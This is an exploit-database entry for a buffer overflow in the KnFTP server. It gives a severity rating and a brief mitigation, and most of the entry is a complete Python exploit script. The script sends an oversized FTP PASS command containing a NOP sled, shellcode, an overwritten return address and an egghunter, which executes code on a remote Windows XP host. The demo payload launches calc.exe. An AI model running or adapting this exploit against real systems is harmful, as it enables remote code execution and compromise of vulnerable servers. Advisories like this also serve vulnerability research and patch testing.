KnFTP Buffer Overflow

vendor:

KnFTP

by:

Blake

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: KnFTP

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2020

A buffer overflow vulnerability exists in KnFTP, which is a non-safeseh module. An attacker can exploit this vulnerability by sending a specially crafted payload of 271 bytes to the vulnerable server, which will overwrite the EIP and SEH registers. This can be used to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of KnFTP, or apply the appropriate patch.

Source

Exploit-DB raw data:

#!/usr/bin/python
# tested on windows xp sp3
# overwrites EIP
# seh is overwritten with larger payloads
# knftpd.exe is the only non safeseh module
import sys,socket

print "\n====================="
print "KnFTP Buffer Overflow"
print "   Written by Blake  "
print "=====================\n"

if len(sys.argv) !=3:
	print "[*] Usage: %s <ip> <port>" % sys.argv[0]
	sys.exit(0)

target = sys.argv[1]
port = int(sys.argv[2])

# 271 bytes of space for shellcode
# 227 bytes windows/exec CMD => calc.exe
shellcode =(
"\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8"
"\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19"
"\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49"
"\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1"
"\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d"
"\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36"
"\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7"
"\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf"
"\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e"
"\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca"
"\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7"
"\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45"
"\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a"
"\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18"
"\x9c\x61")

# 32 byte egghunter
egghunter =(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
"\x54\x30\x30\x57" # egg - W00T
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

egg = "\x54\x30\x30\x57\x54\x30\x30\x57"
buffer = "\x90" * (271 - len(egg + shellcode))
eip = "\x13\x44\x87\x7c" 	# 7C874413 JMP ESP - kernel32.dll
nops = "\x90" * 8

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port) 
try:
	s.connect((target,port))
	print "[+] Sending payload"
	s.send("USER blake \r\n")
	s.recv(1024)
	s.send("PASS " + buffer + egg + shellcode + eip + nops + egghunter + "\r\n")
	s.recv(1024)
	s.close()
	print "[+] Payload sent successfully"
	raw_input("[+] Press any key to exit\n")
except:
	print "[+] Could not connect to %s!" % target
	sys.exit(0)